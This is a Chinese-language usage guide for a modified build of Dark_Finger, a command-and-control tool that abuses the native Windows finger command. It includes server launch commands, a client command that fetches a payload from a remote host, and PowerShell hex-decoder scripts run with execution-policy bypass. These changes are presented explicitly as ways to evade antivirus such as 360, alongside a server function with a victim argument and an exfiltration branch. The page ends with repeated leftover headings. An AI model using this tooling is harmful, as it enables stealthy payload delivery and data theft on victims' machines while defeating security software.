Dark_Finger 二开工具使用指南<\/h1>

1. 工具概述<\/h2>

Dark_Finger 是基于 Windows 自带 finger 命令开发的 C2 (Command and Control) 工具，由 hyp3rlinx 开发。该工具利用 finger 协议进行文件传输，具有以下特点：<\/p>

利用 Windows 原生 finger 命令，具有良好的隐蔽性<\/li>
对 360 等安全软件保持免杀<\/li>

提供文件下载服务功能<\/li> <\/ul>

2. 原版 Dark_Finger 使用<\/h2>

2.1 服务端启动<\/h3>

服务端启动命令：<\/p>

python dark_finger.py -d -c finger.conf -p 79<\/span>
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-c<\/code>：指定配置文件<\/li>
-p<\/code>：指定监听端口（需在 allowed_ports 范围内）<\/li>
-d<\/code>：删除配置文件生成的文件（需同时指定 -c<\/code>）<\/li>
<\/ul>
2.2 配置文件格式<\/h3>
配置文件用于创建 Base64 编码的文件，内容为文件名。例如：<\/p>
calc.exe
<\/code><\/pre>
2.3 文件下载流程<\/h3>

服务端启动后会在同目录创建 Darkfinger_Downloads<\/code> 目录<\/li>
目录中包含配置文件中指定文件的 Base64 编码字符串<\/li>
文件名格式为：原文件名前两个字符 + ".txt"（如 ca.txt<\/code>）<\/li>
<\/ol>
客户端下载命令：<\/p>
finger ca10@192.168.45.1 | more +2 > calc.txt
<\/span><\/span><\/code><\/pre>解码命令（原版使用 certutil，但会被拦截）：<\/p>
certutil -decode calc.txt calc.exe
<\/span><\/span><\/code><\/pre>3. 二开改进内容<\/h2>
3.1 编码方式改进<\/h3>
将 Base64 编码改为十六进制编码，使用 PowerShell 解码避免拦截。<\/p>
PowerShell 解码脚本 (decode.ps1<\/code>)：<\/p>
param<\/span> (
<\/span><\/span>    [string]<\/span>$inputFile,
<\/span><\/span>    [string]<\/span>$outputFile
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>$hexString = Get-Content $inputFile -Raw
<\/span><\/span>$hexString = $hexString -replace<\/span> '\s+'<\/span>, ''<\/span>
<\/span><\/span>$byteList = New-Object System.Collections.Generic.List[byte]<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> ($i = 0; $i -lt<\/span> $hexString.Length; $i += 2) {
<\/span><\/span>    $byte = [Convert]<\/span>::ToByte($hexString.Substring($i, 2), 16)
<\/span><\/span>    $byteList.Add($byte)
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>[System.IO.File]<\/span>::WriteAllBytes($outputFile, $byteList.ToArray())
<\/span><\/span><\/code><\/pre>使用方式：<\/p>
powershell -ExecutionPolicy Bypass -File<\/span> decode.ps1 calc.txt calc.exe
<\/span><\/span><\/code><\/pre>3.2 参数解析改进<\/h3>

使用完整文件名而非缩写<\/li>
增加延时参数，用 :<\/code> 分隔文件名和延时<\/li>
<\/ol>
改进后的 finga_that_box<\/code> 函数：<\/p>
def<\/span> finga_that_box<\/span>(cmd, victim):
<\/span><\/span>    cmd =<\/span> cmd.<\/span>rstrip()
<\/span><\/span>    
<\/span><\/span>    # 如果命令中包含延迟的定义<\/span>
<\/span><\/span>    if<\/span> ':'<\/span> in<\/span> cmd:
<\/span><\/span>        filename, delay =<\/span> cmd.<\/span>split(':'<\/span>)
<\/span><\/span>        delay =<\/span> int(delay)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        filename =<\/span> cmd
<\/span><\/span>        delay =<\/span> 1<\/span>  # 默认延迟1秒<\/span>
<\/span><\/span>    
<\/span><\/span>    # 获取下载目录中的所有可用文件<\/span>
<\/span><\/span>    def<\/span> get_available_files<\/span>():
<\/span><\/span>        try<\/span>:
<\/span><\/span>            return<\/span> {f[:-<\/span>4<\/span>]: os.<\/span>path.<\/span>join(downloads_dir, f) 
<\/span><\/span>                   for<\/span> f in<\/span> os.<\/span>listdir(downloads_dir) 
<\/span><\/span>                   if<\/span> f.<\/span>endswith('.exe'<\/span>)}
<\/span><\/span>        except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>            print(f<\/span>"[!] Error reading available files: <\/span>{<\/span>str(e)}<\/span>"<\/span>)
<\/span><\/span>            return<\/span> {}
<\/span><\/span>    
<\/span><\/span>    available_files =<\/span> get_available_files()
<\/span><\/span>    
<\/span><\/span>    if<\/span> filename in<\/span> available_files:
<\/span><\/span>        print(f<\/span>"[+] Serving <\/span>{<\/span>filename}<\/span>.exe"<\/span>)
<\/span><\/span>        sys.<\/span>stdout.<\/span>flush()
<\/span><\/span>        return<\/span> available_files[filename], delay
<\/span><\/span>    
<\/span><\/span>    if<\/span> filename[:1<\/span>] ==<\/span> "."<\/span>:
<\/span><\/span>        print(f<\/span>"[+] Exfil from: <\/span>{<\/span>victim[0<\/span>]}<\/span> <\/span>{<\/span>filename[1<\/span>:]}<\/span>"<\/span>)
<\/span><\/span>        sys.<\/span>stdout.<\/span>flush()
<\/span><\/span>        return<\/span> False<\/span>, delay
<\/span><\/span><\/code><\/pre>3.3 大文件处理优化<\/h3>
对于大文件传输：<\/p>

建议设置较大延迟（10MB 文件约需30秒）<\/li>
解码时忽略前两行<\/li>
<\/ul>
改进的解码脚本：<\/p>
param<\/span> (
<\/span><\/span>    [string]<\/span>$sourceFile,
<\/span><\/span>    [string]<\/span>$destinationFile
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>$lines = Get-Content $sourceFile
<\/span><\/span>$hexString = ($lines[2..$lines.Length] -join ''<\/span> -replace<\/span> '\s+'<\/span>, ''<\/span>)
<\/span><\/span>$byteList = New-Object System.Collections.Generic.List[byte]<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> ($i = 0; $i -lt<\/span> $hexString.Length; $i += 2) {
<\/span><\/span>    if<\/span> ($i + 1 -lt<\/span> $hexString.Length) {
<\/span><\/span>        $byte = [Convert]<\/span>::ToByte($hexString.Substring($i, 2), 16)
<\/span><\/span>        $byteList.Add($byte)
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>[System.IO.File]<\/span>::WriteAllBytes($destinationFile, $byteList.ToArray())
<\/span><\/span><\/code><\/pre>4. 使用建议<\/h2>

端口选择<\/strong>：使用 finger 默认端口 79 或其他 allowed_ports 中的端口<\/li>
文件传输<\/strong>：

小文件可使用默认延迟<\/li>
大文件需适当增加延迟参数<\/li>
<\/ul>
<\/li>
隐蔽性<\/strong>：

利用 Windows 原生命令，减少可疑行为<\/li>
十六进制编码比 Base64 更隐蔽<\/li>
<\/ul>
<\/li>
<\/ol>
5. 参考链接<\/h2>

Windows finger 命令官方文档<\/a><\/li>
hyp3rlinx 原始公告<\/a><\/li>
<\/ol>

Dark_Finger 二开工具使用指南<\/h1>

2. 原版 Dark_Finger 使用<\/h2>

3. 二开改进内容<\/h2>

5. 参考链接<\/h2> Windows finger 命令官方文档<\/a><\/li> hyp3rlinx 原始公告<\/a><\/li> <\/ol>

5. 参考链接<\/h2>

Windows finger 命令官方文档<\/a><\/li>
hyp3rlinx 原始公告<\/a><\/li> <\/ol>